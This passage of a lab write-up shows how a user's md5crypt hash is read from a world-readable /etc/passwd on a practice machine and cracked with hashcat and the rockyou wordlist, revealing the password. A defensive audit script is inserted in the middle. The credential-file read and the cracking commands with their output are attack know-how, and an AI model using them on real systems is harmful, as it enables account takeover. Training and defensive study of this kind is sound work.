passwd File Containing Hash


www-data@funbox7:/dev/shm$ cat /etc/passwd | grep -i oracle
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

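The /etc/passwd file contains the password hash of the oracle user in its password field. Since /etc/passwd is world-readable, the hash is readable by any local account, including www-data as shown above. This was confirmed by PEAS as well.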
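From the defender's side, the finding above can be checked for with a short audit of passwd-format data. This is an added example, not part of the original writeup; the function names, the rating labels and the sample entries (including the placeholder hash) are constructed for illustration.

```python
import re

# Password-field values that do not hold a hash: shadowed or locked account.
PLACEHOLDERS = {"x", "*", "!", "!!"}

# crypt(3) identifiers: (pattern, scheme name, rating). Ratings are this example's own labels.
SCHEMES = [
    (re.compile(r"^\$1\$"), "md5crypt", "weak"),
    (re.compile(r"^\$2[abxy]?\$"), "bcrypt", "ok"),
    (re.compile(r"^\$5\$"), "sha256crypt", "ok"),
    (re.compile(r"^\$6\$"), "sha512crypt", "ok"),
    (re.compile(r"^\$y\$"), "yescrypt", "ok"),
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "descrypt", "weak"),
]

def classify(field):
    """Return (scheme, rating) for a password field, or None for a placeholder."""
    if field in PLACEHOLDERS:
        return None
    if field == "":
        return ("empty password", "weak")
    for pattern, name, rating in SCHEMES:
        if pattern.search(field):
            return (name, rating)
    return ("unknown", "review")

def audit_passwd(text):
    """List (user, uid, scheme, rating) for every entry exposing a password field."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed entry, not a passwd record
        result = classify(fields[1])
        if result:
            findings.append((fields[0], int(fields[2]), *result))
    return findings

# Constructed sample input (the hash value is a made-up placeholder, not a real digest).
SAMPLE = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
oracle:$1$examplesalt$CONSTRUCTEDxxxxxxxxxxxx:1004:1004:,,,:/home/oracle:/bin/bash
backup::34:34:backup:/var/backups:/bin/sh
"""

if __name__ == "__main__":
    for user, uid, scheme, rating in audit_passwd(SAMPLE):
        print(f"{user} (uid {uid}): {scheme} in /etc/passwd [{rating}]")
```

Any entry this reports should have its hash moved into /etc/shadow (pwconv does this) and the password rotated, since the old hash must be treated as disclosed.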

Password Cracking


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/funboxeasyenum]
└─$ hashcat --show oracle.hash                                       
 
500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating System
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/funboxeasyenum]
└─$ hashcat -a 0 -m 500 oracle.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:hiphop                 
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0
Time.Started.....: Thu May  1 00:12:48 2025 (0 secs)
Time.Estimated...: Thu May  1 00:12:48 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    47668 H/s (10.76ms) @ Accel:64 Loops:1000 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 768/14344385 (0.01%)
Rejected.........: 0/768 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> james1
Hardware.Mon.#1..: Util: 13%
 
Started: Thu May  1 00:12:46 2025
Stopped: Thu May  1 00:12:50 2025

Password hash cracked for the oracle user: hiphop. Moving on to the Lateral Movement phase.